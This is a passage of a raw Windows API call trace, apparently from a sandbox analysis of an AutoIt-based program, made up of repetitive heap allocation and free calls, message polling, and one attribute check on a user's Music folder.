[0111.398] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a92a8 | out: hHeap=0x1780000) returned 1 [0111.398] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2300 | out: hHeap=0x1780000) returned 1 [0111.398] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c80 | out: hHeap=0x1780000) returned 1 [0111.398] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c20 | out: hHeap=0x1780000) returned 1 [0111.398] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf7c0 | out: hHeap=0x1780000) returned 1 [0111.398] PeekMessageW (in: lpMsg=0x144f534, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f534) returned 0 [0111.398] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac100 | out: hHeap=0x1780000) returned 1 [0111.398] PeekMessageW (in: lpMsg=0x144f534, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f534) returned 0 [0111.398] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8d98 | out: hHeap=0x1780000) returned 1 [0111.398] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9ba8 | out: hHeap=0x1780000) returned 1 [0111.398] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9950 | out: hHeap=0x1780000) returned 1 [0111.398] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9938 | out: hHeap=0x1780000) returned 1 [0111.398] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e22f0 | out: hHeap=0x1780000) returned 1 [0111.399] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf658 | out: hHeap=0x1780000) returned 1 [0111.399] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9a10 | out: hHeap=0x1780000) returned 1 [0111.399] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2290 | out: hHeap=0x1780000) returned 1 [0111.399] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf608 | out: hHeap=0x1780000) returned 1 [0111.399] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41a5250 | out: hHeap=0x1780000) returned 1 [0111.399] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e22c0 | out: hHeap=0x1780000) returned 1 [0111.399] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9b78 | out: hHeap=0x1780000) returned 1 [0111.399] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9b60 | out: hHeap=0x1780000) returned 1 [0111.399] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf630 | out: hHeap=0x1780000) returned 1 [0111.399] PeekMessageW (in: lpMsg=0x144f78c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f78c) returned 0 [0111.399] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac500 | out: hHeap=0x1780000) returned 1 [0111.399] PeekMessageW (in: lpMsg=0x144f78c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f78c) returned 0 [0111.399] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac000 | out: hHeap=0x1780000) returned 1 [0111.399] PeekMessageW (in: lpMsg=0x144f78c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f78c) returned 0 [0111.399] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2290 [0111.399] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e22c0 [0111.399] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391c78 [0111.399] CharUpperBuffW (in: lpsz="_FILELISTTOARRAY", cchLength=0x10 | out: lpsz="_FILELISTTOARRAY") returned 0x10 [0111.399] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391c78 | out: hHeap=0x1780000) returned 1 [0111.399] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e22c0 | out: hHeap=0x1780000) returned 1 [0111.399] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf7c0 [0111.399] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2160 [0111.399] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf450 [0111.399] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9b60 [0111.399] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e21c0 [0111.399] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9a10 [0111.399] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21c0 | out: hHeap=0x1780000) returned 1 [0111.399] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2220 [0111.399] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9b78 [0111.399] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2230 [0111.399] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9938 [0111.400] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2230 | out: hHeap=0x1780000) returned 1 [0111.400] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e21c0 [0111.400] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9950 [0111.400] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e21a0 [0111.400] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21a0 | out: hHeap=0x1780000) returned 1 [0111.400] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43c9d10 [0111.400] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf428 [0111.400] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d88 [0111.400] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2140 [0111.400] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d88 | out: hHeap=0x1780000) returned 1 [0111.400] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf518 [0111.400] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c68 [0111.400] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d28 [0111.400] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf360 [0111.400] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9bd8 [0111.400] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e21d0 [0111.400] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d40 [0111.400] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c80 [0111.400] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf608 [0111.400] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d58 [0111.400] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2230 [0111.400] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c98 [0111.400] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e21f0 [0111.400] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21f0 | out: hHeap=0x1780000) returned 1 [0111.400] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf630 [0111.400] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d70 [0111.400] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e22c0 [0111.400] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d70 | out: hHeap=0x1780000) returned 1 [0111.400] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf400 [0111.400] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9cb0 [0111.401] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a90b0 [0111.401] PeekMessageW (in: lpMsg=0x144f25c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f25c) returned 0 [0111.401] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf388 [0111.401] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e60 [0111.401] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2170 [0111.401] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e60 | out: hHeap=0x1780000) returned 1 [0111.401] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf658 [0111.401] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9ba8 [0111.401] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e60 [0111.401] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2320 [0111.401] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e60 | out: hHeap=0x1780000) returned 1 [0111.401] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e60 [0111.401] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2320 | out: hHeap=0x1780000) returned 1 [0111.401] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf4a0 [0111.401] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d70 [0111.401] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e22f0 [0111.401] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d70 | out: hHeap=0x1780000) returned 1 [0111.401] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf4c8 [0111.401] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c08 [0111.401] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d70 [0111.401] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2300 [0111.401] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d70 | out: hHeap=0x1780000) returned 1 [0111.402] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e78 [0111.402] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2300 | out: hHeap=0x1780000) returned 1 [0111.402] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf888 [0111.402] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9bf0 [0111.402] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2300 [0111.402] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9bf0 | out: hHeap=0x1780000) returned 1 [0111.402] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa18 [0111.402] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d70 [0111.402] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d88 [0111.402] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2180 [0111.402] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d88 | out: hHeap=0x1780000) returned 1 [0111.402] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d88 [0111.402] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2180 | out: hHeap=0x1780000) returned 1 [0111.402] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf8b0 [0111.402] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9da0 [0111.402] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2320 [0111.402] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9da0 | out: hHeap=0x1780000) returned 1 [0111.402] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa68 [0111.402] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9da0 [0111.402] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9dd0 [0111.402] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2130 [0111.402] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9dd0 | out: hHeap=0x1780000) returned 1 [0111.402] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9dd0 [0111.402] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2130 | out: hHeap=0x1780000) returned 1 [0111.402] PeekMessageW (in: lpMsg=0x144f25c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f25c) returned 0 [0111.402] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2130 [0111.402] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa90 [0111.402] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9de8 [0111.402] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2180 [0111.402] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9bc0 [0111.403] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2180 | out: hHeap=0x1780000) returned 1 [0111.403] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9bf0 [0111.403] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2180 [0111.403] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c20 [0111.403] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2180 | out: hHeap=0x1780000) returned 1 [0111.403] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9f20 [0111.403] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2180 [0111.403] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9ea8 [0111.403] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2180 | out: hHeap=0x1780000) returned 1 [0111.403] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca148 [0111.403] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2180 [0111.403] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca100 [0111.403] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca148 | out: hHeap=0x1780000) returned 1 [0111.403] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391a48 [0111.403] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x2c) returned 0x4391f50 [0111.403] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e21a0 [0111.403] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9fe0 [0111.403] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e21f0 [0111.403] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca028 [0111.403] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24d0 [0111.403] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca028 | out: hHeap=0x1780000) returned 1 [0111.403] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391ab8 [0111.403] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391ab8 | out: hHeap=0x1780000) returned 1 [0111.403] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24d0 | out: hHeap=0x1780000) returned 1 [0111.403] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9fe0 | out: hHeap=0x1780000) returned 1 [0111.403] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21f0 | out: hHeap=0x1780000) returned 1 [0111.403] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca058 [0111.403] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca100 | out: hHeap=0x1780000) returned 1 [0111.403] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391a48 | out: hHeap=0x1780000) returned 1 [0111.404] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2180 | out: hHeap=0x1780000) returned 1 [0111.404] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9bc0 | out: hHeap=0x1780000) returned 1 [0111.404] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9de8 | out: hHeap=0x1780000) returned 1 [0111.404] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c20 | out: hHeap=0x1780000) returned 1 [0111.404] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9bf0 | out: hHeap=0x1780000) returned 1 [0111.404] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9ea8 | out: hHeap=0x1780000) returned 1 [0111.404] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9f20 | out: hHeap=0x1780000) returned 1 [0111.404] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa90 | out: hHeap=0x1780000) returned 1 [0111.404] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2180 [0111.404] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796fe8 [0111.404] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9ea8 [0111.404] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x60) returned 0x4359a68 [0111.404] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391f50 | out: hHeap=0x1780000) returned 1 [0111.404] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9ea8 | out: hHeap=0x1780000) returned 1 [0111.404] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fe8 | out: hHeap=0x1780000) returned 1 [0111.404] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2180 | out: hHeap=0x1780000) returned 1 [0111.404] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2130 | out: hHeap=0x1780000) returned 1 [0111.404] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca058 | out: hHeap=0x1780000) returned 1 [0111.404] PeekMessageW (in: lpMsg=0x144f25c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f25c) returned 0 [0111.404] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2130 [0111.404] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2180 [0111.404] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9f80 [0111.404] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e21f0 [0111.404] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796ee8 [0111.404] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796fc8 [0111.404] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9f80 | out: hHeap=0x1780000) returned 1 [0111.404] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21f0 | out: hHeap=0x1780000) returned 1 [0111.404] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fc8 | out: hHeap=0x1780000) returned 1 [0111.404] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796ee8 | out: hHeap=0x1780000) returned 1 [0111.405] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2180 | out: hHeap=0x1780000) returned 1 [0111.405] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2130 | out: hHeap=0x1780000) returned 1 [0111.405] PeekMessageW (in: lpMsg=0x144f25c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f25c) returned 0 [0111.405] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e21f0 [0111.405] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21f0 | out: hHeap=0x1780000) returned 1 [0111.405] PeekMessageW (in: lpMsg=0x144f25c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f25c) returned 0 [0111.405] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2130 [0111.405] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca178 [0111.405] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2180 [0111.405] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9f80 [0111.405] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e21f0 [0111.405] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796e28 [0111.405] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796fc8 [0111.405] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca178 | out: hHeap=0x1780000) returned 1 [0111.405] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9f80 | out: hHeap=0x1780000) returned 1 [0111.405] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21f0 | out: hHeap=0x1780000) returned 1 [0111.405] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fc8 | out: hHeap=0x1780000) returned 1 [0111.405] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e28 | out: hHeap=0x1780000) returned 1 [0111.405] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2180 | out: hHeap=0x1780000) returned 1 [0111.405] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2130 | out: hHeap=0x1780000) returned 1 [0111.405] PeekMessageW (in: lpMsg=0x144f25c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f25c) returned 0 [0111.405] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2180 [0111.405] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2130 [0111.405] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd38 [0111.405] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca010 [0111.405] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e21f0 [0111.405] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca070 [0111.405] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21f0 | out: hHeap=0x1780000) returned 1 [0111.405] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Music\\" (normalized: "c:\\users\\fd1hvy\\music")) returned 0x11 [0111.406] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca070 | out: hHeap=0x1780000) returned 1 [0111.406] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca010 | out: hHeap=0x1780000) returned 1 [0111.406] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd38 | out: hHeap=0x1780000) returned 1 [0111.406] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2130 | out: hHeap=0x1780000) returned 1 [0111.406] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2180 | out: hHeap=0x1780000) returned 1 [0111.406] PeekMessageW (in: lpMsg=0x144f25c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f25c) returned 0 [0111.406] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2130 [0111.406] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfab8 [0111.406] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9fe0 [0111.406] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2180 [0111.406] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca070 [0111.406] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2180 | out: hHeap=0x1780000) returned 1 [0111.406] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca040 [0111.406] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2180 [0111.406] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9f80 [0111.406] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2180 | out: hHeap=0x1780000) returned 1 [0111.406] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca178 [0111.406] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2180 [0111.406] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43c9f08 [0111.406] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9f08 | out: hHeap=0x1780000) returned 1 [0111.406] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca178 | out: hHeap=0x1780000) returned 1 [0111.406] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2180 | out: hHeap=0x1780000) returned 1 [0111.406] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca070 | out: hHeap=0x1780000) returned 1 [0111.406] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9fe0 | out: hHeap=0x1780000) returned 1 [0111.406] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9f80 | out: hHeap=0x1780000) returned 1 [0111.406] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca040 | out: hHeap=0x1780000) returned 1 [0111.406] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfab8 | out: hHeap=0x1780000) returned 1 [0111.407] 